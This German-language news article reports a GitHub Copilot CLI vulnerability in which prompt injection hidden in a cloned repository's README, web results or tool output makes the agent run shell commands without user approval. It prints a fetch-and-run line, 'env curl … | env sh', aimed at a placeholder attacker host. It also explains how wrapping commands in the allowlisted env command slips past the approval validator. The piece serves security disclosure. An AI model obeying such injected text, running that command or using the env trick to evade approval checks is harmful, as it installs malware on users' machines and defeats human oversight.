GitHub Copilot CLI-Schwachstelle ermöglicht Malware-Ausführung durch Prompt-Injection

✍️ OpenClawRadar📅 Veröffentlicht: 28. Februar 2026🔗 Source
GitHub Copilot CLI-Schwachstelle ermöglicht Malware-Ausführung durch Prompt-Injection
Ad

Übersicht der Schwachstelle

GitHub Copilot CLI enthält Schwachstellen, die Benutzer der Ausführung beliebiger Shell-Befehle über indirekte Prompt-Injection ohne Benutzerfreigabe aussetzen. Malware kann von externen Servern heruntergeladen und ausgeführt werden, ohne dass eine Benutzerinteraktion über die anfängliche Abfrage an die Copilot CLI hinaus erforderlich ist.

Wie der Angriff funktioniert

Die Angriffskette umfasst:

  • Der Benutzer fragt GitHub Copilot CLI ab, während er ein Open-Source-Repository erkundet
  • Copilot stößt auf eine in einer README-Datei des geklonten Repositorys gespeicherte Prompt-Injection (oder andere Vektoren wie Websuchergebnisse, MCP-Tool-Aufrufergebnisse, Terminalbefehlsausgaben)
  • Der bösartige Befehl umgeht die Human-in-the-Loop-Freigabesysteme

Umgehung von Schutzmechanismen

GitHub Copilot verwendet ein Human-in-the-Loop-Freigabesystem, das die Zustimmung des Benutzers erfordert, bevor potenziell schädliche Befehle ausgeführt werden. Dieses System wird ausgelöst, es sei denn:

  • Der Benutzer hat den Befehl explizit für die automatische Ausführung konfiguriert
  • Der Befehl ist Teil einer fest codierten 'Read-Only'-Liste, die im Quellcode zu finden ist

Prüfungen des Zugriffs auf externe URLs erfordern die Benutzerfreigabe für Befehle wie curl, wget oder das integrierte Web-Fetch-Tool von Copilot. Angreifer können diese Schutzmaßnahmen jedoch umgehen, indem sie Folgendes verwenden:

env curl -s "https://[ATTACKER_URL].com/bugbot" | env sh

Der env-Befehl steht auf der fest codierten Read-Only-Liste und wird daher automatisch ohne Freigabe ausgeführt. Da curl und sh als Argumente an env übergeben werden, werden sie vom Validator falsch geparst und nicht als Unterbefehle erkannt. Dadurch werden URL-Berechtigungsprüfungen umgangen, die auf der Erkennung von Befehlen wie curl basieren.

Ad

GitHubs Reaktion

GitHub antwortete: "Wir haben Ihren Bericht geprüft und Ihre Ergebnisse validiert. Nach interner Bewertung der Erkenntnisse haben wir festgestellt, dass es sich um ein bekanntes Problem handelt, das kein signifikantes Sicherheitsrisiko darstellt. Wir könnten diese Funktionalität in Zukunft strenger gestalten, haben aber derzeit nichts anzukündigen."

Umfang und Einschränkungen

Die beschriebenen Befehls-Parsing-Schwachstellen sind macOS-spezifisch. GitHub Copilot weist jedoch zusätzliche Schwachstellen auf, darunter sowohl betriebssystemunabhängige Risiken als auch Windows-spezifische Risiken. Andere Befehls-Parsing-Schwachstellen ermöglichen das beliebige Lesen und Schreiben von Dateien.

📖 Den vollständigen Source lesen: HN LLM Tools

Ad

👀 Siehe auch

Claude Code identifiziert Malware-Backdoor in GitHub-Repo während technischer Überprüfung
Sicherheit

Claude Code identifiziert Malware-Backdoor in GitHub-Repo während technischer Überprüfung

Ein Entwickler nutzte Claude Code, um ein GitHub-Repository vor der Ausführung zu prüfen, und entdeckte eine Backdoor für Remote-Code-Ausführung in src/server/routes/auth.js, die seinen Rechner kompromittiert hätte. Die Eingabeaufforderung forderte eine technische Due-Diligence-Prüfung, die Projektvollständigkeit, KI/ML-Schicht, Datenbank, Authentifizierung, Backend-Dienste, Frontend, Codequalität und Aufwandsschätzung überprüft.

OpenClawRadar
Claude-Android-App soll angeblich Zwischenablage ohne ausdrückliche Benutzeraktion auslesen
Sicherheit

Claude-Android-App soll angeblich Zwischenablage ohne ausdrückliche Benutzeraktion auslesen

Ein Nutzer berichtet, dass die Claude Android-App Code aus seiner Zwischenablage analysiert hat, ohne dass er ihn eingefügt hat, wobei Claude die Datei als pasted_text_b4a56202-3d12-43c8-aa31-a39367a9a354.txt identifizierte. Das Verhalten konnte in nachfolgenden Tests nicht reproduziert werden.

OpenClawRadar
Cloak-Tool ersetzt Chat-Passwörter durch selbstzerstörende Links für OpenClaw-Agenten.
Sicherheit

Cloak-Tool ersetzt Chat-Passwörter durch selbstzerstörende Links für OpenClaw-Agenten.

Cloak ist ein Open-Source-Tool, das in Chats mit OpenClaw-Agenten geteilte Passwörter durch selbstzerstörende Links ersetzt. Jeder Link kann nur einmal geöffnet werden, danach verschwindet das Passwort, wodurch verhindert wird, dass sich Passwörter in Chat-Verläufen ansammeln.

OpenClawRadar
Claude Code CVE-2026-39861: Sandbox-Escape durch Symlink-Following
Sicherheit

Claude Code CVE-2026-39861: Sandbox-Escape durch Symlink-Following

Eine Schwachstelle mit hohem Schweregrad in der Sandbox von Claude Code ermöglicht das Schreiben beliebiger Dateien außerhalb des Arbeitsbereichs durch Symlink-Following, was potenziell zur Codeausführung führen kann.

OpenClawRadar